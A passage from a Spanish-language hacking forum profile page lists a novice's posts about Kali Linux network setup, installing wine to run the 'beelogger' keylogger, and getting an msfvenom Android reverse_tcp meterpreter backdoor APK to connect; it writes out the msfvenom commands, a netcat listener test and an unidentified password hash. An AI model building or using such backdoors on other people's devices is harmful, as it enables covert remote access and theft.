Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - DammZ

Páginas: [1]
1
Dudas y pedidos generales / Poblema al instalar wine Kali LInux
« en: Septiembre 01, 2017, 08:06:22 pm »
Hola buenas a todos amigos de Undercode, tengo un problema con instalar wine porque me dice lo siguiente:

Código: You are not allowed to view links. Register or Login
apt-get install wine
Código: You are not allowed to view links. Register or Login
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho El paquete wine no está disponible, pero algún otro paquete hace referencia
a él. Esto puede significar que el paquete falta, está obsoleto o sólo se encuentra disponible desde alguna otra fuente

E: El paquete «wine» no tiene un candidato para la instalación


====================================================================================================
Es para utilizar beelogger lo que pasa es que me dice que no tengo instalado wine32 y lo que hize fue eliminar wine e intentar instalarlo de nuevo, muchas gracias por la ayuda de antemano

2
Dudas y pedidos generales / Re:Problema conexión Kali Linux
« en: Enero 22, 2017, 08:10:04 pm »
You are not allowed to view links. Register or Login
Antes de cambiar las configuraciones de red de tu Kali, te recomiendo intentar agregar otro Adaptador de red pero en NAT(Por ejemplo), para ir descartando problemas, verifica tambien que en el Estatus del dispositivo aparescan las casillas activadas, Suerte!

Estoy instalandolo de nuevo, he descubierto que esto no me salía You are not allowed to view links. Register or Login cuando me instalé el anterior kali, lo que hice despues fue configurarlo manualmente poniendo mi ip local y dandole todo a continuar, no se porque me da error de dhcp

3
Dudas y pedidos generales / Re:Problema conexión Kali Linux
« en: Enero 22, 2017, 07:58:10 pm »
You are not allowed to view links. Register or Login
Antes de cambiar las configuraciones de red de tu Kali, te recomiendo intentar agregar otro Adaptador de red pero en NAT(Por ejemplo), para ir descartando problemas, verifica tambien que en el Estatus del dispositivo aparescan las casillas activadas, Suerte!

Tuve muchos problemas con adaptadores de red, por lo que me pasé a tener un cable conectado directamente, y en cuanto a eso de verificar el estatus del dispositivo no se a donde tengo que irme para verificarlo, gracias de antemano

4
Dudas y pedidos generales / Problema conexión Kali Linux
« en: Enero 21, 2017, 01:02:03 pm »
Hola buenas, miren tengo un problema con mi cable ethernet, instale mi máquina kali linux de debian y lo configuré poniendo la opción de "Bridget" y marcando la casilla, todo esto lo realizo en VMWare 10, luego al estar dentro de la máquina probé mi conexión metiendome en iceweasel y buscando cualquier cosa, pero no funcionaba y me decia "Servidor no encontrado" y algunas razones típicas por las cuales podría haber ocurrido, seguidamente miré tutoriales e hice un ajuste en /etc/network-manager y edite la configuracion con leafpad cambiando "managed=false" por "managed=true" , y en la esquina superior izquierda me salia que estaba conectado a "ifupdown (eth0)" volví a probar la conexión con el navegador y haciendo ping pero ninguna respuesta, ayudenme a solucionar esto por favor

5
Dudas y pedidos generales / Re:Problema con backdoor metasploit
« en: Enero 04, 2017, 06:02:01 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Bueno, mi problema es que al crear un backdoor para android (.apk) con el siguiente comando en la terminal de kali linux (VMWare Station) msfvenom -p android/meterpreter/reverse_tcp LHOST= Ip de ifconfig LPORT=5555 > virusdeprueba.apk

Hasta ahí todo bien, luego descargo el .apk en mi dispositivo móvil conectado a la misma red, por lo que no creo que haya que abrir puertos, antes de eso me voy a msfconsole y configuro todo usando multi/handler con el payload, lport y lhost y le pongo exploit, luego abro la apk y no me sale ninguna sesión , además la apk pasa a llamarse MainActivity con el robot verde de android como icono

Si hay que abrir puertos ensenme como abrirlos pls

la APK que creas tiene una conexion muy poco inestable, yo realiza la prueba hace bastante ya y la conexion se perdia a los pocos segundos,al estar en local no hace falta que abras los puertos.
Te dejo un par de links a ver si te pueden ayudar :)

You are not allowed to view links. Register or Login

Vale muchas gracias por tu ayuda, a ver si puedo arreglarlo

6
Dudas y pedidos generales / Problema con backdoor metasploit
« en: Enero 03, 2017, 01:29:11 pm »
Bueno, mi problema es que al crear un backdoor para android (.apk) con el siguiente comando en la terminal de kali linux (VMWare Station) msfvenom -p android/meterpreter/reverse_tcp LHOST= Ip de ifconfig LPORT=5555 > virusdeprueba.apk

Hasta ahí todo bien, luego descargo el .apk en mi dispositivo móvil conectado a la misma red, por lo que no creo que haya que abrir puertos, antes de eso me voy a msfconsole y configuro todo usando multi/handler con el payload, lport y lhost y le pongo exploit, luego abro la apk y no me sale ninguna sesión , además la apk pasa a llamarse MainActivity con el robot verde de android como icono

Si hay que abrir puertos ensenme como abrirlos pls

7
Dudas y pedidos generales / Hacking Falso o Verdadero
« en: Noviembre 09, 2016, 08:17:07 pm »
Un amigo me contó hace unos 15 minutos que un amigo suyo en el instituto puso porno en el ordenador de su clase desde su móvil con una supuesta aplicación, en la que mi amigo me explica que es creada en ordenador pero dice que la pasa a formato apk y hace un emulador del programa en versión Android, dice que consiste en sacar la ip del. Ordenador o router no tengo no idea y desde ahí tiene acceso al ordenador y desde esa aplicación hacer lo que quiera, y a mi obviamente esto me ha sonado a gilipollez y mentira más grande que nada,  mi amigo dice que sabe mucho de eso, alguien puede decirme si es verdadero o falso lo que acabo de escuchar? PD:Además dice que lo vio en ese momento que lo hizo

8
You are not allowed to view links. Register or Login
Ok a ver...

Tienes metasploit en una maquina virtual? o en un equipo normal?

En una máquina virtual (virtualbox) , mi pc es un windows 10

9
You are not allowed to view links. Register or Login
Entra al msfconsole y despues de configurar todas las variables, haz un :

Código: You are not allowed to view links. Register or Login
show options
Comparte la salida por aqui.

Me huele a que todo el problema es una mal configuracion de los puertos.
You are not allowed to view links. Register or Login
Sistema virtualizado? Eso es porque no tenes la conexión bien configurada. Deberías tener una dirección 192.168.x.x configura la placa de red desde el Virtual box ovmware y avisame

Normalmente vbox reparte direcciones 192.168..1.0/24 pero igual deberia funcionarte con cualquier otra direccion privada como 10.0.0.0/8 y 172.16.0.0/16.

Saludos.

Global Options:
===============

   Option            Current Setting    Description
   ------            ---------------    -----------
   ConsoleLogging    false              Log all console input and output
   LogLevel          0                  Verbosity of logs (default 0, max 3)
   MinimumRank       0                  The minimum rank of exploits that will run without explicit confirmation
   Prompt            msf                The prompt string
   PromptChar        >                  The prompt character
   PromptTimeFormat  %Y-%m-%d %H:%M:%S  Format for timestamp escapes in prompts
   SessionLogging    false              Log all input and output for sessions
   TimestampOutput   false              Prefix all console output with a timestamp


Me sale eso cuando pongo show options en msfconsole, como dijistes que funciona con la ip privada de 10.0.2.15 con esa ya probe y el archivo .apk al abrirse no hace nada la terminal no responde cuando se abre la apk

La apk fue creada en la terminal poniendo msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=9999(NO se si este es el adecuado si pueden recomendarme uno os lo agradeceria) R > android.apk

10
You are not allowed to view links. Register or Login
127.0.0.1 siempre apunta a la misma maquina
10.0.2.15 es la que tenes que usar
la otra no se de donde la sacaste

para probarlo hace esto:
en la computadora corre sudo nc -lvvp 80
en el celular abri el navegador y entra a You are not allowed to view links. Register or Login /
deberias ver una conexion en la consola donde abriste nc

No me sale nada en la consola, activo el comando , luego abro You are not allowed to view links. Register or Login / en el celular y no ocurre nada en la terminal :/

11
You are not allowed to view links. Register or Login
Sistema virtualizado? Eso es porque no tenes la conexión bien configurada. Deberías tener una dirección 192.168.x.x configura la placa de red desde el Virtual box ovmware y avisame

Me puedes explicar eso mas a fondo? Soy nuevo en esto de las máquinas virtuales

12
Bueno el problema es el siguiente, quiero hacer una prueba de exploit con mi movil android para ver si funciona y el problema es cuando configuro el LHOST que no se que ip poner porque cuando pongo ifconfig me sale lo siguiente:

+eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        inet6 fe80::a00:27ff:fe7d:8ba9  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:7d:8b:a9  txqueuelen 1000  (Ethernet)
        RX packets 34328  bytes 31173780 (29.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 13667  bytes 1195080 (1.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 0  (Local Loopback)
        RX packets 28  bytes 1640 (1.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 28  bytes 1640 (1.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

La duda es que ip pongo en LHOST? Probe con 10.0.2.15 , 192.168.1.17(pc windows10) y 127.0.0.1

El otro problema es que cuando inicio el exploit y abro la aplicación falsa en mi teléfono móvil, no ocurre nada en la terminal... se queda igual que sin abrir la aplicación (Todo esto lo hago con metasploit(como es normal) )

Esto me pasa también con ataques a otros pc, se queda igual

Saludos y muchas gracias :)

PD: Por cierto mi conexion es por cable ethernet


13
La pass es 827AE002038F5B49562C74DEBE292A8901A7878B

14
Bueno tengo una password encriptada en ... ahi esta el problema la password tiene 65 caracteres, y el hash mas aproximado es SHA256 que son 64 caracteres pero es muy raro y no encuentro nada que pueda desencriptarla, si me podeis ayudar, por favor, manden privado xD :-X

Páginas: [1]